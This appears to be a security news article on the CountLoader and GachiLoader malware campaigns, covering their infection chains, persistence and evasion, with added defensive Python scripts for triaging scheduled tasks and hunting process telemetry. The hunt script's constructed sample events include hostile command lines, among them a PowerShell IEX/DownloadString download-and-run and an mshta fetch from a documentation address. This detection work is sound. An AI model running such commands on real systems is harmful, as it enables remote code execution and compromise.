Cybercriminals Exploit Cracked Software and YouTube Videos to Spread CountLoader and GachiLoader Malware
Cybersecurity researchers have documented two campaigns that use cracked-software download sites and YouTube videos to distribute malware loaders, CountLoader and GachiLoader respectively. Both are first-stage components in multistage intrusions: they establish a foothold, check for and evade security tooling, and fetch and run follow-on payloads.
CountLoader’s Evolution and Distribution Tactics
CountLoader, a modular and stealthy loader, has been active since at least June 2025. First documented by Fortinet and Silent Push, it has been used to deploy a range of payloads, including Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The latest iteration, CountLoader 3.2, adds capabilities and uses a more elaborate distribution chain.
The infection chain begins when a user searches for a cracked copy of legitimate software, such as Microsoft Word, and is redirected to a MediaFire link hosting a malicious ZIP archive. That archive contains a second, password-protected ZIP together with a Microsoft Word document holding the password, a layering that hinders automated scanning of the inner archive at the hosting site. Once the inner archive is extracted, the payload is a renamed legitimate Python interpreter (Setup.exe) that runs a malicious command through mshta.exe to retrieve CountLoader 3.2 from a remote server.
To establish persistence, CountLoader creates a scheduled task named GoogleTaskSystem136.0.7023.12, a name chosen to resemble legitimate Google update components, that runs every 30 minutes for ten years. It also queries the list of installed antivirus products through Windows Management Instrumentation (WMI) to check for security tools such as CrowdStrike Falcon; if one is found, it switches to a different execution method to avoid detection.
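A task definition like the one above is what a responder exports with `schtasks /Query /XML /TN "<name>"` (or `Export-ScheduledTask`) during triage. As an added example, not code from the original article or from any published CountLoader analysis, the following Python script parses Task Scheduler XML and flags the traits the page describes: a short repetition interval sustained for years, an action that is a script host or lives in a user-writable location, and a vendor-style name whose action does not sit in the vendor's directory. The two XML documents embedded in it are constructed samples; the path and argument in the suspicious one are assumptions modelled on the article's description, not recovered artefacts.

```python
"""Triage exported Task Scheduler XML for loader-style persistence.

Added example, not code from the article or from CountLoader analysis.
Export a task on a host with:  schtasks /Query /XML /TN "<task name>"
(or Export-ScheduledTask in PowerShell) and pass the text to triage_task().
The two documents below are constructed samples: one imitates the task the
article describes, the other a normal vendor update task.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts the CountLoader chain leans on (mshta, rundll32, PowerShell),
# plus the WSH interpreters; a task whose action is one of these needs a look.
SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(users|appdata|temp|programdata|public)\\|%(appdata|temp|localappdata)%", re.I)
# Vendor-style name with a four-part build number, e.g. GoogleTaskSystem136.0.7023.12
VENDOR_LOOKALIKE = re.compile(r"^(Google|Microsoft|Adobe|Chrome|Edge)\w*\d+(\.\d+){3}$")
TRUSTED_VENDOR_DIR = re.compile(r"^[a-z]:\\program files( \(x86\))?\\(google|microsoft|adobe)\\", re.I)
_DURATION = re.compile(r"^P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """Convert a Task Scheduler duration string (PnYnMnDTnHnMnS) to seconds."""
    m = _DURATION.match(text or "")
    if not m:
        return None
    y, mo, d, h, mi, s = (int(x or 0) for x in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 3600 + mi * 60 + s


def triage_task(xml_text):
    """Return (task name, list of findings) for one task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1]
    findings = []

    # Loader beacons: short repetition interval sustained for a very long time
    # (the article's task: every 30 minutes for a decade).
    for rep in root.iterfind(".//t:Repetition", NS):
        interval = iso_duration_seconds(rep.findtext("t:Interval", default="", namespaces=NS))
        duration = iso_duration_seconds(rep.findtext("t:Duration", default="", namespaces=NS))
        if interval and interval <= 3600 and duration and duration >= 365 * 86400:
            findings.append(f"beacon-like schedule: every {interval // 60} min for {duration // 86400} days")

    for action in root.iterfind("t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        exe = cmd.rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            findings.append(f"action is a script host: {exe} {args}".rstrip())
        if USER_WRITABLE.search(cmd):
            findings.append(f"action binary lives in a user-writable path: {cmd}")
        if VENDOR_LOOKALIKE.match(name) and not TRUSTED_VENDOR_DIR.match(cmd):
            findings.append(f"vendor-lookalike name {name!r} but action is outside the vendor directory")
    return name, findings


# Constructed sample imitating the task described in the article (path and
# argument are assumptions, not recovered artefacts).
SUSPICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\Public\Setup.exe</Command>
      <Arguments>loader.py</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample resembling a normal vendor updater task.
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineUA</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>PT1H</Interval><Duration>P1D</Duration></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASK, BENIGN_TASK):
        task_name, task_findings = triage_task(sample)
        print(task_name, "->", task_findings or "no findings")
```

The three checks are deliberately independent so that a single one is enough to surface a task for review; in practice the beacon-schedule rule is the one that survives attackers renaming the task, because the loader still has to be re-launched frequently to keep its foothold.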
CountLoader’s capabilities include:
– Downloading and executing executables from specified URLs.
– Retrieving ZIP archives containing Python modules or executables for execution.
– Downloading and running DLLs via rundll32.exe.
– Installing MSI packages.
– Removing its own scheduled tasks to clean up after itself and reduce forensic traces.
– Collecting and exfiltrating extensive system information.
– Spreading via removable media by creating malicious shortcuts (LNK files) that execute both the original file and the malware.
– Executing remote PowerShell payloads in memory.
In observed attacks, CountLoader ultimately deploys ACR Stealer, an information stealer that harvests sensitive data from infected systems. The campaign shows that CountLoader continues to evolve, and that defending against it calls for behavioural detection of its loader stages and layered controls rather than reliance on file signatures alone.
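The chain described above (a renamed Python interpreter that launches mshta.exe, plus the rundll32, PowerShell and scheduled-task capabilities in the list) leaves a recognisable parent-child pattern in process-creation telemetry. As an added example, not from the article or from any vendor product, here is a small Python hunt over normalised process events that looks for exactly those relationships. The events, file names and addresses are constructed to imitate the described chain (203.0.113.10 is a documentation range), and the rules generalise slightly beyond the page by flagging a renamed interpreter regardless of which child it spawns.

```python
"""Hunt process-creation telemetry for the CountLoader execution chain.

Added example, not code from the article or from any vendor product.  It
assumes events normalised into (pid, ppid, image, original_name, cmdline),
roughly what Sysmon event 1 or an EDR process log provides; the events
below are constructed, and 203.0.113.10 is a documentation address.
"""
import re
from typing import NamedTuple


class Event(NamedTuple):
    pid: int
    ppid: int
    image: str
    original_name: str  # OriginalFileName from the PE version resource
    cmdline: str


INTERPRETERS = {"python.exe", "pythonw.exe"}
USER_WRITABLE = re.compile(r"\\(users|appdata|temp|programdata|public)\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
IN_MEMORY_PS = re.compile(r"-e(nc\w*|c)\s|\biex\b|invoke-expression|downloadstring|frombase64string", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_renamed_interpreter(ev):
    """A legitimate interpreter shipped under another file name (a Setup.exe
    whose version resource still says python.exe)."""
    original = ev.original_name.lower()
    return original in INTERPRETERS and original != basename(ev.image)


def hunt(events):
    """Return [(pid, image basename, [reasons])] for events matching the chain."""
    by_pid = {ev.pid: ev for ev in events}
    alerts = []
    for ev in events:
        img = basename(ev.image)
        parent = by_pid.get(ev.ppid)
        reasons = []
        if is_renamed_interpreter(ev):
            reasons.append(f"renamed interpreter: {ev.image} is really {ev.original_name}")
        if parent and is_renamed_interpreter(parent):
            reasons.append(f"spawned by renamed interpreter (pid {parent.pid})")
        if img == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
            reasons.append("mshta fetching remote content")
        if img == "rundll32.exe" and USER_WRITABLE.search(ev.cmdline):
            reasons.append("rundll32 loading a DLL from a user-writable path")
        if img in {"powershell.exe", "pwsh.exe"} and IN_MEMORY_PS.search(ev.cmdline):
            reasons.append("PowerShell in-memory or encoded payload")
        if img == "schtasks.exe" and re.search(r"/delete\b", ev.cmdline, re.I):
            reasons.append("scheduled task removal (cleanup)")
        if reasons:
            alerts.append((ev.pid, img, reasons))
    return alerts


# Constructed events: pids 200-600 form the chain the article describes,
# pids 700-900 are ordinary activity that must not alert.
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    Event(200, 100, r"C:\Users\bob\Downloads\Setup.exe", "python.exe", "Setup.exe loader.py"),
    Event(300, 200, r"C:\Windows\System32\mshta.exe", "MSHTA.EXE", "mshta.exe http://203.0.113.10/stage.hta"),
    Event(400, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
          "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')\""),
    Event(500, 200, r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE", r"rundll32.exe C:\Users\bob\AppData\Local\Temp\u.dll,Start"),
    Event(600, 200, r"C:\Windows\System32\schtasks.exe", "schtasks.exe", "schtasks /Delete /TN GoogleTaskSystem136.0.7023.12 /F"),
    Event(700, 100, r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    Event(800, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE", "powershell.exe -Command Get-Date"),
    Event(900, 100, r"C:\Python312\python.exe", "python.exe", "python.exe build.py"),
]

if __name__ == "__main__":
    for pid, img, reasons in hunt(SAMPLE_EVENTS):
        print(pid, img, "; ".join(reasons))
```

The renamed-interpreter check is the most robust piece: the original file name comes from the PE version resource, which the attacker left intact when renaming python.exe to Setup.exe, so it keeps working even if the loader changes which script host it calls next.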
GachiLoader’s Deployment via YouTube Videos
Separately, researchers have identified a new, heavily obfuscated JavaScript loader named GachiLoader, distributed through a network of compromised YouTube accounts. Distribution through hijacked, established accounts lets the campaign borrow the trust and reach of a popular video-sharing platform instead of having to build a credible lure site of its own.
The attack begins with the criminals hijacking legitimate YouTube accounts, often ones with substantial followings, and uploading videos that promote cracked software or similar bait. Each video description carries links that send viewers to attacker-controlled sites hosting GachiLoader.
On those sites, visitors are prompted to download a file presented as the installer or update the video promised. The file contains heavily obfuscated JavaScript designed to defeat static and signature-based scanning. Once a user runs it, GachiLoader starts a multistage infection, downloading and executing further payloads chosen by the attacker. Because the first stage is a script rather than a compiled binary, its obfuscation mainly targets static analysis; the script still has to launch follow-on processes and contact its servers, which is where detection efforts should focus.
Using YouTube as the distribution vector gives the attackers fast reach to a broad audience and lowers viewers' guard, since the lure arrives through a trusted channel. It also complicates detection and takedown, because the pointer to the malicious content lives on a legitimate platform while the payload itself is hosted elsewhere.
Mitigation Strategies and Recommendations
CountLoader and GachiLoader show how far distribution tradecraft has moved from plain email attachments toward trusted intermediaries such as file-hosting services and video platforms. To reduce exposure to these threats, users and organisations should adopt the following measures:
1. Exercise Caution with Software Downloads: Do not download software from unverified sources, and in particular avoid cracked versions of legitimate applications; the password-protected archive plus companion document pattern described above is itself a warning sign. Obtain software only from official websites or trusted vendors.
2. Be Wary of Links in Video Descriptions: Treat links in video descriptions with caution even on reputable platforms like YouTube, since the account posting them may be hijacked. Verify the source before proceeding.
3. Implement Robust Security Solutions: Use security software capable of detecting behaviour rather than only known file hashes, keep it up to date and correctly configured, and constrain the script hosts this chain depends on (mshta.exe, rundll32.exe, PowerShell and the Windows Script Host) with application control or attack surface reduction policies where business use allows.
4. Regularly Update Systems and Software: Keep operating systems, applications, and security software current to close known vulnerabilities.
5. Educate Users on Cybersecurity Best Practices: Train users to recognise phishing, suspicious links, and the risks of running unverified downloads, including files that arrive as a renamed "Setup.exe".
6. Monitor for Unusual Activity: Collect process-creation and scheduled-task telemetry and alert on the patterns these loaders produce: tasks that repeat at short intervals under vendor-lookalike names, script hosts spawned by unexpected parents, WMI queries for installed antivirus products, and LNK files appearing on removable drives.
By adopting these measures, individuals and organizations can enhance their defenses against the sophisticated and evolving threats posed by malware loaders like CountLoader and GachiLoader.